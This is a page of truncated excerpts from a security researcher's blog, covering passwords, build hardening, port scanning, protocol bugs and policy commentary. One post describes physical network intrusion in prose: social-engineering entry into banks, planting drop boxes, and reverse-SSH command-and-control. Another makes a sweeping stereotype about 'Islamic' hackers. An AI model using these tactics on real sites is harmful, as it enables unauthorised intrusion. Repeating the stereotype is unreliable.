ErrataRob.webp 2019-01-28 22:21:56 Passwords in a file (lien direct) My dad is on some sort of committee for his local home owners association. He asked about saving all the passwords in a file stored on Microsoft's cloud OneDrive, along with policy/procedures for the association. I assumed he called because I'm an internationally recognized cyberexpert. Or maybe he just wanted to chat with me*. Anyway, I thought I'd write up a response.The most important rule of cybersecurity is that it depends upon the risks/costs. That means if what you want to do is write down the procedures for operating a garden pump, including the passwords, then that's fine. This is because there's not much danger of hackers exploiting this. On the other hand, if the question is passwords for the association's bank account, then DON'T DO THIS. Such passwords should never be online. Instead, write them down and store the pieces of paper in a secure place.OneDrive is secure, as much as anything is. The problem is that people aren't secure. There's probably one member of the home owner's association who is constantly infecting themselves with viruses or falling victim to scams. This is the person who you are giving OneDrive access to. This is fine for the meaningless passwords, but very much not fine for bank accounts.OneDrive also has some useful backup features. Thus, when one of your members infects themselves with ransomware, which will encrypt all the OneDrive's contents, you can retrieve the old versions of the documents. I highly recommend groups like the home owner's association use OneDrive. I use it as part of my Office 365 subscription for $99/year.Just don't do this for banking passwords. In fact, not only should you not store such a password online, you should strongly consider getting "two factor authentication" setup for the account. This is a system where you need an additional hardware device/token in addition to a password (in some cases, your phone can be used as the additional device). This may not work if multiple people need to access a common account, but then, you should have multiple passwords, for each individual, in such cases. Your bank should have descriptions of how to set this up. If your bank doesn't offer two factor authentication for its websites, then you really need to switch banks.For individuals, write your passwords down on paper. For elderly parents, write down a copy and give it to your kids. It should go without saying: store that paper in a safe place, ideally a safe, not a post-it note glued to your monitor. Again, this is for your important passwords, like for bank accounts and e-mail. For your Spotify or Pandora accounts (music services), then security really doesn't matter.Lastly, the way hackers most often break into things like bank accounts is because people use the same password everywhere. When one site gets hacked, those passwords are then used to hack accounts on other websites. Thus, for important accounts, don't reuse passwords, make them unique for just that account. Since you can't remember unique passwords for every account, write them down.You can check if your password has been hacked this way by checking http://haveibeenpwned.com and entering your email address. Entering my dad's email address, I find that his accounts at Adobe, LinkedIn, and Disqus has been discovered by hackers (due to hacks of those websites) and published. I sure hope whatever these passwords were that they are not the same or similar to his passwords for GMail or his bank account.
* the lame joke at the top was my dad's, so don't blame me :-)
Hack
ErrataRob.webp 2018-12-15 22:40:22 Notes on Build Hardening (lien direct) I thought I'd comment on a paper about "build safety" in consumer products, describing how software is built to harden it against hackers trying to exploit bugs.What is build safety?Modern languages (Java, C#, Go, Rust, JavaScript, Python, etc.) are inherently "safe", meaning they don't have "buffer-overflows" or related problems.However, C/C++ is "unsafe", and is the most popular language for building stuff that interacts with the network. In other cases, while the language itself may be safe, it'll use underlying infrastructure ("libraries") written in C/C++. When we are talking about hardening builds, making them safe or security, we are talking about C/C++.In the last two decades, we've improved both hardware and operating-systems around C/C++ in order to impose safety on it from the outside. We do this with  options when the software is built (compiled and linked), and then when the software is run.That's what the paper above looks at: how consumer devices are built using these options, and thereby, measuring the security of these devices.In particular, we are talking about the Linux operating system here and the GNU compiler gcc. Consumer products almost always use Linux these days, though a few also use embedded Windows or QNX. They are almost always built using gcc, though some are built using a clone known as clang (or llvm).How software is builtSoftware is first compiled then linked. Compiling means translating the human-readable source code into machine code. Linking means combining multiple compiled files into a single executable.Consider a program hello.c. We might compile it using the following command:gcc -o hello hello.cThis command takes the file, hello.c, compiles it, then outputs -o an executable with the name hello.We can set additional compilation options on the command-line here. For example, to enable stack guards, we'd compile with a command that looks like the following:gcc -o hello -fstack-protector hello.cIn the following sections, we are going to look at specific options and what they do.Stack guardsA running program has various kinds of memory, optimized for different use cases. One chunk of memory is known as the stack. This is the scratch pad for functions. When a function in the code is called, the stack grows with additional scratchpad needs of that functions, then shrinks back when the function exits. As functions call other functions, which call other functions, the stack keeps growing larger and larger. When they return, it then shrinks back again.The scratch pad for each function is known as the stack frame. Among the things stored in the stack frame is the return address, where the function was called from so that when it exits, the caller of the function can continue executing where it left off.The way stack guards work is to stick a carefully constructed value in between each stack frame, known as a canary. Right before the function exits, it'll check this canary in order to validate it hasn't been corrupted. If corruption is detected, the program exits, or crashes, to prevent worse things from happening.This solves the most common exploited vulnerability in C/C++ code, the stack buffer-overflow. This is the bug described in that famous paper Smashing the Stack for Fun and Profit& Guideline
ErrataRob.webp 2018-12-11 22:59:55 Notes about hacking with drop tools (lien direct) In this report, Kasperky found Eastern European banks hacked with Raspberry Pis and "Bash Bunnies" (DarkVishnya). I thought I'd write up some more detailed notes on this.Drop toolsA common hacking/pen-testing technique is to drop a box physically on the local network. On this blog, there are articles going back 10 years discussing this. In the old days, this was done with $200 "netbook" (cheap notebook computers). These days, it can be done with $50 "Raspberry Pi" computers, or even $25 consumer devices reflashed with Linux.A "Raspberry Pi" is a $35 single board computer, for which you'll need to add about another $15 worth of stuff to get it running (power supply, flash drive, and cables). These are extremely popular hobbyist computers that are used everywhere from home servers, robotics, and hacking. They have spawned a large number of clones, like the ODROID, Orange Pi, NanoPi, and so on. With a quad-core, 1.4 GHz, single-issue processor, 2 gigs of RAM, and typically at least 8 gigs of flash, these are pretty powerful computers.Typically what you'd do is install Kali Linux. This is a Linux "distro" that contains all the tools hackers want to use.You then drop this box physically on the victim's network. We often called these "dropboxes" in the past, but now that there's a cloud service called "Dropbox", this becomes confusing, so I guess we can call them "drop tools". The advantage of using something like a Raspberry Pi is that it's cheap: once dropped on a victim's network, you probably won't ever get it back again.Gaining physical access to even secure banks isn't that hard. Sure, getting to the money is tightly controlled, but other parts of the bank aren't not nearly as secure. One good trick is to pretend to be a banking inspector. At least in the United States, they'll quickly bend over an spread them if they think you are a regulator. Or, you can pretend to be maintenance worker there to fix the plumbing. All it takes is a uniform with a logo and what appears to be a valid work order. If questioned, whip out the clipboard and ask them to sign off on the work. Or, if all else fails, just walk in brazenly as if you belong.Once inside the physical network, you need to find a place to plug something in. Ethernet and power plugs are often underneath/behind furniture, so that's not hard. You might find access to a wiring closet somewhere, as Aaron Swartz famously did. You'll usually have to connect via Ethernet, as it requires no authentication/authorization. If you could connect via WiFi, you could probably do it outside the building using directional antennas without going through all this.Now that you've got your evil box installed, there is the question of how you remotely access it. It's almost certainly firewalled, preventing any inbound connection.One choice is to configure it for outbound connections. When doing pentests, I configure reverse SSH command-prompts to a command-and-control server. Another alternative is to create a SSH Tor hidden service. There are a myriad of other ways you might do this. They all suffer the problem that anybody looking at the organization's outbound traffic can notice these connections.Another alternative is to use the WiFi. This allows you to physically sit outside in the parking lot and connect to the box. This can sometimes be detected using WiFi intrusion prevention systems, though it's not hard to get around that. The downside is that it puts you in some physical jeopardy, because you have to be physically near the building. However, you can mitigate this in some cases, such as sticking a second Raspberry Pi in a nearby bar that is close enough to connection, and then use the bar's Internet connection to hop-scotch on in. Vulnerability
ErrataRob.webp 2018-11-18 19:51:36 Some notes about HTTP/3 (lien direct) HTTP/3 is going to be standardized. As an old protocol guy, I thought I'd write up some comments.Google (pbuh) has both the most popular web browser (Chrome) and the two most popular websites (#1 Google.com #2 Youtube.com). Therefore, they are in control of future web protocol development. Their first upgrade they called SPDY (pronounced "speedy"), which was eventually standardized as the second version of HTTP, or HTTP/2. Their second upgrade they called QUIC (pronounced "quick"), which is being standardized as HTTP/3.SPDY (HTTP/2) is already supported by the major web browser (Chrome, Firefox, Edge, Safari) and major web servers (Apache, Nginx, IIS, CloudFlare). Many of the most popular websites support it (even non-Google ones), though you are unlikely to ever see it on the wire (sniffing with Wireshark or tcpdump), because it's always encrypted with SSL. While the standard allows for HTTP/2 to run raw over TCP, all the implementations only use it over SSL.There is a good lesson here about standards. Outside the Internet, standards are often de jure, run by government, driven by getting all major stakeholders in a room and hashing it out, then using rules to force people to adopt it. On the Internet, people implement things first, and then if others like it, they'll start using it, too. Standards are often de facto, with RFCs being written for what is already working well on the Internet, documenting what people are already using. SPDY was adopted by browsers/servers not because it was standardized, but because the major players simply started adding it. The same is happening with QUIC: the fact that it's being standardized as HTTP/3 is a reflection that it's already being used, rather than some milestone that now that it's standardized that people can start using it.QUIC is really more of a new version of TCP (TCP/2???) than a new version of HTTP (HTTP/3). It doesn't really change what HTTP/2 does so much as change how the transport works. Therefore, my comments below are focused on transport issues rather than HTTP issues.The major headline feature is faster connection setup and latency. TCP requires a number of packets being sent back-and-forth before the connection is established. SSL again requires a number of packets sent back-and-forth before encryption is established. If there is a lot of network delay, such as when people use satellite Internet with half-second ping times, it can take quite a long time for a connection to be established. By reducing round-trips, connections get setup faster, so that when you click on a link, the linked resource pops up immediatelyThe next headline feature is bandwidth. There is always a bandwidth limitation between source and destination of a network connection, which is almost always due to congestion. Both sides need to discover this speed so that they can send packets at just the right rate. Sending packets too fast, so that they'll get dropped, causes even more congestion for others without improving transfer rate. Sending packets too slowly means unoptimal use of the network.How HTTP traditionally does this is bad. Using a single TCP connection didn't work for HTTP because interactions with websites require multiple things to be transferred simultaneously, so browsers opened multiple connections to the web server (typically 4). However, this breaks the bandwidth estimation, because each of your TCP connections is trying to do it independently as if the other connections don't exist. SPDY addressed this by its multiplexing feature that combined multiple interactions between browser/server with a single bandwidth calculation.QUIC extends this multiplexing, making it even easier to handle multiple interactions between the browser/server, without any one interaction blocking another, but with a common bandwidth estimation. This will make interactions smoother from a user's perspective, while
ErrataRob.webp 2018-11-04 18:22:46 Brian Kemp is bad on cybersecurity (lien direct) I'd prefer a Republican governor, but as a cybersecurity expert, I have to point out how bad Brian Kemp (candidate for Georgia governor) is on cybersecurity. When notified about vulnerabilities in election systems, his response has been to shoot the messenger rather than fix the vulnerabilities. This was the premise behind the cybercrime bill earlier this year that was ultimately vetoed by the current governor after vocal opposition from cybersecurity companies. More recently, he just announced that he's investigating the Georgia State Democratic Party for a "failed hacking attempt".According to news stories, state elections websites are full of common vulnerabilities, those documented by the OWASP Top 10, such as "direct object references" that would allow any election registration information to be read or changed, as allowing a hacker to cancel registrations of those of the other party.Testing for such weaknesses is not a crime. Indeed, it's desirable that people can test for security weaknesses. Systems that aren't open to test are insecure. This concept is the basis for many policy initiatives at the federal level, to not only protect researchers probing for weaknesses from prosecution, but to even provide bounties encouraging them to do so. The DoD has a "Hack the Pentagon" initiative encouraging exactly this.But the State of Georgia is stereotypically backwards and thuggish. Earlier this year, the legislature passed SB 315 that criminalized this activity of merely attempting to access a computer without permission, to probe for possibly vulnerabilities. To the ignorant and backwards person, this seems reasonable, of course this bad activity should be outlawed. But as we in the cybersecurity community have learned over the last decades, this only outlaws your friends from finding security vulnerabilities, and does nothing to discourage your enemies. Russian election meddling hackers are not deterred by such laws, only Georgia residents concerned whether their government websites are secure.It's your own users, and well-meaning security researchers, who are the primary source for improving security. Unless you live under a rock (like Brian Kemp, apparently), you'll have noticed that every month you have your Windows desktop or iPhone nagging you about updating the software to fix security issues. If you look behind the scenes, you'll find that most of these security fixes come from outsiders. They come from technical experts who accidentally come across vulnerabilities. They come from security researchers who specifically look for vulnerabilities.It's because of this "research" that systems are mostly secure today. A few days ago was the 30th anniversary of the "Morris Worm" that took down the nascent Internet in 1988. The net of that time was hostile to security research, with major companies ignoring vulnerabilities. Systems then were laughably insecure, but vendors tried to address the problem by suppressing research. The Morris Worm exploited several vulnerabilities that were well-known at the time, but ignored by the vendor (in this case, primarily Sun Microsystems).Since then, with a culture of outsiders disclosing vulnerabilities, vendors have been pressured into fix them. This has led to vast improvements in security. I'm posting this from a public WiFi hotspot in a bar, for example, because computers are secure enough for this to be safe. 10 years ago, such activity wasn't safe.The Georgia Democrats obviously have concerns about the integrity of election systems. They have every reason to thoroughly probe an elections website looking for vulnerabilities. This sort of activity should be encouraged, not supp Vulnerability Threat Guideline
ErrataRob.webp 2018-11-02 02:57:36 Why no cyber 9/11 for 15 years? (lien direct) This The Atlantic article asks why hasn't there been a cyber-terrorist attack for the last 15 years, or as it phrases it:National-security experts have been warning of terrorist cyberattacks for 15 years. Why hasn't one happened yet?As a pen-tester whose broken into power grids and found 0day exploits in control center systems, I thought I'd write up some comments.Instead of asking why one hasn't happened yet, maybe we should instead ask why national-security experts keep warning about them.One possible answer is that national-security experts are ignorant. I get the sense that "national security experts" have very little expertise in cyber. That's why I include a brief resume at the top of this article, I've actually broken into a power grid and found 0days in critical power grid products (specifically, the ABB implementation of ICCP on AIX -- it's rather an obvious buffer-overflow, *cough* ASN.1 *cough*, I don't know if they ever fixed it).Another possibility is that they are fear mongering in order to support their agenda. That's the problem with "experts", they get their expertise by being employed to achieve some goal. The ones who know most about an issue are simultaneously the ones most biased about an issue. They have every incentive to make people be afraid, and little incentive to tell the truth.The most likely answer, though, is simply because they can. Anybody can warn of "digital 9/11" and be taken seriously, regardless of expertise. They'll get all the press. It's always the Morally Right thing to say. You never have to back it up with evidence. Conversely, those who say the opposite don't get the same level of press, and are frequently challenged to defend their abnormal stance.Indeed, that's this article by The Atlantic works. It's entire premise is that the national security experts are still "right" even though their predictions haven't happened, and it's reality that's "wrong".Now let's consider the original question.One good answer in the article is "cause certain types of fear and terror, that garner certain media attention, that galvanize followers". Blowing something up causes more fear in the target population than deleting some data.But the same is true of the terrorists themselves, that they prefer violence. In other words, what motivates terrorists, the ends or the means? It is it the need to achieve a political goal? Or is it simply about looking for an excuse to commit violence?I suspect that it's the later issue. It's not that terrorists are violent so much as violent people are attracted to terrorism. This can explain a lot, such as why they have such poor op-sec and encryption, as I've written about before. They enjoy learning how to shoot guns and trigger bombs, but they don't enjoy learning how to use a computer correctly.I've explored the cyber Islamic dark web and come to a couple conclusions about it. The primary motivation of these hackers is gay porn. A frequent initiation rite to gain access to these forums is to send post pictures of your, well, equipment. Such things are repressed in their native countries and societies, so hacking becomes a necessary skill in order to get it.It's hard for us to understand their motivations. From our western perspective, we'd think gay young men would be on our side, motivated to fight against their own governments in defense of gay rights, in order to achieve marriage equality. None of them want that. Their goal is to get married and have children. Sure, they want gay sex and intimate relationships with men, but they also want a subservient wife who manages the household, and the deep family ties that Hack
ErrataRob.webp 2018-11-01 02:03:51 Masscan and massive address lists (lien direct) I saw this go by on my Twitter feed. I thought I'd blog on how masscan solves the same problem.If you do @nmap scanning with big exclusion lists, things are about to get a lot faster. ;)- Daniel Miller ✝ (@bonsaiviking) November 1, 2018Both nmap and masscan are port scanners. The differences is that nmap does an intensive scan on a limited range of addresses, whereas masscan does a light scan on a massive range of addresses, including the range of 0.0.0.0 - 255.255.255.255 (all addresses). If you've got a 10-gbps link to the Internet, it can scan the entire thing in under 10 minutes, from a single desktop-class computer.How massan deals with exclude ranges is probably its defining feature. That seems kinda strange, since it's a little used feature in nmap. But when you scan the entire list, people will complain, with nasty emails, so you are going to build up a list of hundreds, if not thousands, of addresses to exclude from your scans.Therefore, the first design choice is to combine the two lists, the list of targets to include and the list of targets to exclude. Other port scanners don't do this because they typically work from a large include list and a short exclude list, so they optimize for the larger thing. In mass scanning the Internet, the exclude list is the largest thing, so that's what we optimize for. It makes sense to just combine the two lists.So the performance now isn't how to lookup an address in an exclude list efficiently, it's how to quickly choose a random address from a large include target list.Moreover, the decision is how to do it with as little state as possible. That's the trick for sending massive numbers of packets at rates of 10 million packets-per-second, it's not keeping any bookkeeping of what was scanned. I'm not sure exactly how nmap randomizes it's addresses, but the documentation implies that it does a block of a addresses at a time, and randomizes that block, keeping state on which addresses it's scanned and which ones it hasn't.The way masscan is not to randomly pick an IP address so much as to randomize the index.To start with, we created a sorted list of IP address ranges, the targets. The total number of IP addresses in all the ranges is target_count (not the number of ranges but the number of all IP addresses). We then define a function pick() that returns one of those IP addresses given the index:    ip = pick(targets, index);Where index is in the range [0..target_count].This function is just a binary search. After the ranges have been sorted, a start_index value is added to each range, which is the total number of IP addresses up to that point. Thus, given a random index, we search the list of start_index values to find which range we've chosen, and then which IP address address within that range. The function is here, though reading it, I realize I need to refactor it to make it clearer. (I read the comments telling me to refactor it, and I realize I haven't gotten around to that yet :-).Given this system, we can now do an in-order (not randomized) port scan by doing the follow
ErrataRob.webp 2018-10-27 07:28:06 Systemd is bad parsing and should feel bad (lien direct) Systemd has a remotely exploitable bug in it's DHCPv6 client. That means anybody on the local network can send you a packet and take control of your computer. The flaw is a typical buffer-overflow. Several news stories have pointed out that this client was written from scratch, as if that were the moral failing, instead of reusing existing code. That's not the problem.The problem is that it was written from scratch without taking advantage of the lessons of the past. It makes the same mistakes all over again.In the late 1990s and early 2000s, we learned that parsing input is a problem. The traditional ad hoc approach you were taught in school is wrong. It's wrong from an abstract theoretical point of view. It's wrong from the practical point of view, error prone and leading to spaghetti code.The first thing you need to unlearn is byte-swapping. I know that this was some sort epiphany you had when you learned network programming but byte-swapping is wrong. If you find yourself using a macro to swap bytes, like the be16toh() macro used in this code, then you are doing it wrong.But, you say, the network byte-order is big-endian, while today's Intel and ARM processors are little-endian. So you have to swap bytes, don't you?No. As proof of the matter I point to every other language other than C/C++. They don't don't swap bytes. Their internal integer format is undefined. Indeed, something like JavaScript may be storing numbers as a floating points. You can't muck around with the internal format of their integers even if you wanted to.An example of byte swapping in the code is something like this:In this code, it's taking a buffer of raw bytes from the DHCPv6 packet and "casting" it as a C internal structure. The packet contains a two-byte big-endian length field, "option->len", which the code must byte-swap in order to use.Among the errors here is casting an internal structure over external data. From an abstract theory point of view, this is wrong. Internal structures are undefined. Just because you can sort of know the definition in C/C++ doesn't change the fact that they are still undefined.From a practical point of view, this leads to confusion, as the programmer is never quite clear as to the boundary between external and internal data. You are supposed to rigorously verify external data, because the hacker controls it. You don't keep double-checking and second-guessing internal data, because that would be stupid. When you blur the lines between internal and external data, then your checks get muddled up.Yes you can, in C/C++, cast an internal structure over external data. But just because you can doesn't mean you should. What you should do instead is parse data the same way as if you were writing code in JavaScript. For example, to grab the DHCP6 option length field, you should write something like: Guideline
ErrataRob.webp 2018-10-23 20:03:42 Masscan as a lesson in TCP/IP (lien direct) When learning TCP/IP it may be helpful to look at the masscan port scanning program, because it contains its own network stack. This concept, "contains its own network stack", is so unusual that it'll help resolve some confusion you might have about networking. It'll help challenge some (incorrect) assumptions you may have developed about how networks work.For example, here is a screenshot of running masscan to scan a single target from my laptop computer. My machine has an IP address of 10.255.28.209, but masscan runs with an address of 10.255.28.250. This works fine, with the program contacting the target computer and downloading information -- even though it has the 'wrong' IP address. That's because it isn't using the network stack of the notebook computer, and hence, not using the notebook's IP address. Instead, it has its own network stack and its own IP address.At this point, it might be useful to describe what masscan is doing here. It's a "port scanner", a tool that connects to many computers and many ports to figure out which ones are open. In some cases, it can probe further: once it connects to a port, it can grab banners and version information.In the above example, the parameters to masscan used here are:-p80 : probe for port "80", which is the well-known port assigned for web-services using the HTTP protocol--banners : do a "banner check", grabbing simple information from the target depending on the protocol. In this case, it grabs the "title" field from the HTML from the server, and also grabs the HTTP headers. It does different banners for other protocols.--source-ip 10.255.28.250 : this configures the IP address that masscan will use172.217.197.113 : the target to be scanned. This happens to be a Google server, by the way, though that's not really important.Now let's change the IP address that masscan is using to something completely different, like 1.2.3.4. The difference from the above screenshot is that we no longer get any data in response. Why is that? Guideline
ErrataRob.webp 2018-10-22 16:33:56 Some notes for journalists about cybersecurity (lien direct) The recent Bloomberg article about Chinese hacking motherboards is a great opportunity to talk about problems with journalism.Journalism is about telling the truth, not a close approximation of the truth,  but the true truth. They don't do a good job at this in cybersecurity.Take, for example, a recent incident where the Associated Press fired a reporter for photoshopping his shadow out of a photo. The AP took a scorched-earth approach, not simply firing the photographer, but removing all his photographs from their library.That's because there is a difference between truth and near truth.Now consider Bloomberg's story, such as a photograph of a tiny chip. Is that a photograph of the actual chip the Chinese inserted into the motherboard? Or is it another chip, representing the size of the real chip? Is it truth or near truth?Or consider the technical details in Bloomberg's story. They are garbled, as this discussion shows. Something like what Bloomberg describes is certainly plausible, something exactly what Bloomberg describes is impossible. Again there is the question of truth vs. near truth.There are other near truths involved. For example, we know that supply chains often replace high-quality expensive components with cheaper, lower-quality knockoffs. It's perfectly plausible that some of the incidents Bloomberg describes is that known issue, which they are then hyping as being hacker chips. This demonstrates how truth and near truth can be quite far apart, telling very different stories.Another example is a NYTimes story about a terrorist's use of encryption. As I've discussed before, the story has numerous "near truth" errors. The NYTimes story is based upon a transcript of an interrogation of the hacker. The French newspaper Le Monde published excerpts from that interrogation, with details that differ slightly from the NYTimes article.One the justifications journalists use is that near truth is easier for their readers to understand. First of all, that's not justification for false hoods. If the words mean something else, then it's false. It doesn't matter if its simpler. Secondly, I'm not sure they actually are easier to understand. It's still techy gobbledygook. In the Bloomberg article, if I as an expert can't figure out what actually happened, then I know that the average reader can't, either, no matter how much you've "simplified" the language.Stories can solve this by both giving the actual technical terms that experts can understand, then explain them. Yes, it eats up space, but if you care about the truth, it's necessary.In groundbreaking stories like Bloomberg's, the length is already enough that the average reader won't slog through it. Instead, it becomes a seed for lots of other coverage that explains the story. In such cases, you want to get the techy details, the actual truth, correct, so that we experts can stand behind the story and explain it. Otherwise, going for the simpler near truth means that all us experts simply question the veracity of the story.The companies mentioned in the Bloomberg story have called it an out Hack
ErrataRob.webp 2018-10-21 18:10:54 TCP/IP, Sockets, and SIGPIPE (lien direct) There is a spectre haunting the Internet -- the spectre of SIGPIPE errors. It's a bug in the original design of Unix networking from 1981 that is perpetuated by college textbooks, which teach students to ignore it. As a consequence, sometimes software unexpectedly crashes. This is particularly acute on industrial and medical networks, where security professionals can't run port/security scans for fear of crashing critical devices.An example of why this bug persists is the well-known college textbook "Unix Network Programming" by Richard Stevens. In section 5.13, he correctly describes the problem.When a process writes to a socket that has received an RST, the SIGPIPE signal is sent to the process. The default action of this signal is to terminate the process, so the process must catch the signal to avoid being involuntarily terminated.This description is accurate. The "Sockets" network APIs was based on the "pipes" interprocess communication when TCP/IP was first added to the Unix operating system back in 1981. This made it straightforward and comprehensible to the programmers at the time. This SIGPIPE behavior made sense when piping the output of one program to another program on the command-line, as is typical under Unix: if the receiver of the data crashes, then you want the sender of the data to also stop running. But it's not the behavior you want for networking. Server processes need to continue running even if a client crashes.But Steven's description is insufficient. It portrays this problem as optional, that only exists if the other side of the connection is misbehaving. He never mentions the problem outside this section, and none of his example code handles the problem. Thus, if you base your code on Steven's, it'll inherit this problem and sometimes crash.The simplest solution is to configure the program to ignore the signal, such as putting the following line of code in your main() function:   signal(SIGPIPE, SIG_IGN);If you search popular projects, you'll find that this there solution most of the time, such as openssl.But there is a problem with this approach, as OpenSSL demonstrates: it's both a command-line program and a library. The command-line program handles this error, but the library doesn't. This means that using the SSL_write() function to send encrypted data may encounter this error. Nowhere in the OpenSSL documentation does it mention that the user of the library needs to handle this.Ideally, library writers would like to deal with the problem internally. There are platform-specific ways to deal with this. On Linux, an additional parameter MSG_NOSIGNAL can be added to the send() function. On BSD (including macOS), setsockopt(SO_NOSIGPIPE) can be configured for the socket when it's created (after socket() or after accept()). On Windows and some other operating systems, the SIGPIPE isn't even generated, so nothing needs to be done for those platforms.But it's difficult. Browsing through cross platform projects like curl, which tries this library technique, I see the following bit:#ifdef __SYMBIAN32__/* This isn't actually supported under Symbian OS */#undef SO_NOSIGPIPE Guideline
ErrataRob.webp 2018-10-19 19:24:46 Election interference from Uber and Lyft (lien direct) Almost nothing can escape the taint of election interference. A good example is the announcements by Uber and Lyft that they'll provide free rides to the polls on election day. This well-meaning gesture nonetheless calls into question how this might influence the election."Free rides" to the polls is a common thing. Taxi companies have long offered such services for people in general. Political groups have long offered such services for their constituencies in particular. Political groups target retirement communities to get them to the polls, black churches have long had their "Souls to the Polls" program across the 37 states that allow early voting on Sundays.But with Uber and Lyft getting into this we now have concerns about "big data", "algorithms", and "hacking".As the various Facebook controversies have taught us, these companies have a lot of data on us that can reliably predict how we are going to vote. If their leaders wanted to, these companies could use this information in order to get those on one side of an issue to the polls. On hotly contested elections, it wouldn't take much to swing the result to one side.Even if they don't do this consciously, their various algorithms (often based on machine learning and AI) may do so accidentally. As is frequently demonstrated, unconscious biases can lead to real world consequences, like facial recognition systems being unable to read Asian faces.Lastly, it makes these companies prime targets for Russian hackers, who may take all these into account when trying to muck with elections. Or indeed, to simply claim that they did in order to call the results into question. Though to be fair, Russian hackers have so many other targets of opportunity. Messing with the traffic lights of a few cities would be enough to swing a presidential election, specifically targeting areas with certain voters with traffic jams making it difficult for them to get to the polls.Even if it's not "hackers" as such, many will want to game the system. For example, politically motivated drivers may choose to loiter in neighborhoods strongly on one side or the other, helping the right sorts of people vote at the expense of not helping the wrong people. Likewise, drivers might skew the numbers by deliberately hailing rides out of opposing neighborhoods and taking them them out of town, or to the right sorts of neighborhoods.I'm trying to figure out which Party this benefits the most. Let's take a look at rider demographics to start with, such as this post. It appears that income levels and gender are roughly evenly distributed.Ridership is skewed urban, with riders being 46% urban, 48% suburban, and 6% rural. In contrast, US population is 31% urban, 55% suburban, and 15% rural. Giving the increasing polarization among rural and urban voters, this strongly skews results in favor of Democrats.Likewise, the above numbers show that Uber ridership is strongly skewed to the younger generation, with 55% of the riders 34 and younger. This again strongly skews "free rides" by Uber and Lyft toward the Democrats. Though to be fair, the "over 65" crowd has long had an advantage as the parties have fallen over themselves to bus people from retirement communities to the polls (and that older people can get free time on weekdays to vote).Even if you are on the side that appears to benefit, this should still concern you. Our allegiance should first be to a robust and fa Guideline Uber
ErrataRob.webp 2018-10-16 17:06:57 Notes on the UK IoT cybersec "Code of Practice" (lien direct) The British government has released a voluntary "Code of Practice" for securing IoT devices. I thought I'd write some notes on it.First, the good partsBefore I criticize the individual points, I want to praise if for having a clue. So many of these sorts of things are written by the clueless, those who want to be involved in telling people what to do, but who don't really understand the problem.The first part of the clue is restricting the scope. Consumer IoT is so vastly different from things like cars, medical devices, industrial control systems, or mobile phones that they should never really be talked about in the same guide.The next part of the clue is understanding the players. It's not just the device that's a problem, but also the cloud and mobile app part that relates to the device. Though they do go too far and include the "retailer", which is a bit nonsensical.Lastly, while I'm critical of most all the points on the list and how they are described, it's probably a complete list. There's not much missing, and the same time, it includes little that isn't necessary. In contrast, a lot of other IoT security guides lack important things, or take the "kitchen sink" approach and try to include everything conceivable.1) No default passwordsSince the Mirai botnet of 2016 famously exploited default passwords, this has been at the top of everyone's list. It's the most prominent feature of the recent California IoT law. It's the major feature of federal proposals.But this is only a superficial understanding of what really happened. The issue wasn't default passwords so much as Internet-exposed Telnet.IoT devices are generally based on Linux which maintains operating-system passwords in the /etc/passwd file. However, devices almost never use that. Instead, the web-based management interface maintains its own password database. The underlying Linux system is vestigial like an appendix and not really used.But these devices exposed Telnet, providing a path to this otherwise unused functionality. I bought several of the Mirai-vulnerable devices, and none of them used /etc/passwd for anything other than Telnet.Another way default passwords get exposed in IoT devices is through debugging interfaces. Manufacturers configure the system one way for easy development, and then ship a separate "release" version. Sometimes they make a mistake and ship the development backdoors as well. Programmers often insert secret backdoor accounts into products for development purposes without realizing how easy it is for hackers to discover those passwords.The point is that this focus on backdoor passwords is misunderstanding the problem. Device makers can easily believe they are compliant with this directive while still having backdoor passwords.As for the web management interface, saying "no default passwords" is useless. Users have to be able to setup the device the first time, so there has to be some means to connect to the device without passwords initially. Device makers don't know how to do this without default passwords. Instead of mindless guidance of what not to do, a document needs to be written that explains how devices can do this both securely as well as easy enough for users to use.Humorously, the footnotes in this section do reference external documents that might explain this, but they are the wrong documents, appropriate for things like website password policies, but inappropriate for IoT web interfaces. This again demonstrates how they have only a superficial understanding of the problem.2) Implement a vulnerability disclosure policyThis is a clueful item, and it should be the #1 item on every list. Hack
ErrataRob.webp 2018-10-14 04:57:46 How to irregular cyber warfare (lien direct) Somebody (@thegrugq) pointed me to this article on "Lessons on Irregular Cyber Warfare", citing the masters like Sun Tzu, von Clausewitz, Mao, Che, and the usual characters. It tries to answer:...as an insurgent, which is in a weaker power position vis-a-vis a stronger nation state; how does cyber warfare plays an integral part in the irregular cyber conflicts in the twenty-first century between nation-states and violent non-state actors or insurgenciesI thought I'd write a rebuttal.None of these people provide any value. If you want to figure out cyber insurgency, then you want to focus on the technical "cyber" aspects, not "insurgency". I regularly read military articles about cyber written by those, like in the above article, which demonstrate little experience in cyber.The chief technical lesson for the cyber insurgent is the Birthday Paradox. Let's say, hypothetically, you go to a party with 23 people total. What's the chance that any two people at the party have the same birthday? The answer is 50.7%. With a party of 75 people, the chance rises to 99.9% that two will have the same birthday.The paradox is that your intuitive way of calculating the odds is wrong. You are thinking the odds are like those of somebody having the same birthday as yourself, which is in indeed roughly 23 out of 365. But we aren't talking about you vs. the remainder of the party, we are talking about any possible combination of two people. This dramatically changes how we do the math.In cryptography, this is known as the "Birthday Attack". One crypto task is to uniquely fingerprint documents. Historically, the most popular way of doing his was with an algorithm known as "MD5" which produces 128-bit fingerprints. Given a document, with an MD5 fingerprint, it's impossible to create a second document with the same fingerprint. However, with MD5, it's possible to create two documents with the same fingerprint. In other words, we can't modify only one document to get a match, but we can keep modifying two documents until their fingerprints match. Like a room, finding somebody with your birthday is hard, finding any two people with the same birthday is easier.The same principle works with insurgencies. Accomplishing one specific goal is hard, but accomplishing any goal is easy. Trying to do a narrowly defined task to disrupt the enemy is hard, but it's easy to support a group of motivated hackers and let them do any sort of disruption they can come up with.The above article suggests a means of using cyber to disrupt a carrier attack group. This is an example of something hard, a narrowly defined attack that is unlikely to actually work in the real world.Conversely, consider the attacks attributed to North Korea, like those against Sony or the Wannacry virus. These aren't the careful planning of a small state actor trying to accomplish specific goals. These are the actions of an actor that supports hacker groups, and lets them loose without a lot of oversight and direction. Wannacry in particular is an example of an undirected cyber attack. We know from our experience with network worms that its effects were impossible to predict. Somebody just stuck the newly discovered NSA EternalBlue payload into an existing virus framework and let it run to see what happens. As we worm experts know, nobody could have predicted the results of doing so, not even its creators.Another example is the DNC election hacks. The reason we can attribute them to Russia is because it wasn't their narrow goal. Instead, by looking at things like their URL shortener, we can see that they flailed around broadly all over cyberspace. The DNC was just one of thei Hack Guideline Wannacry
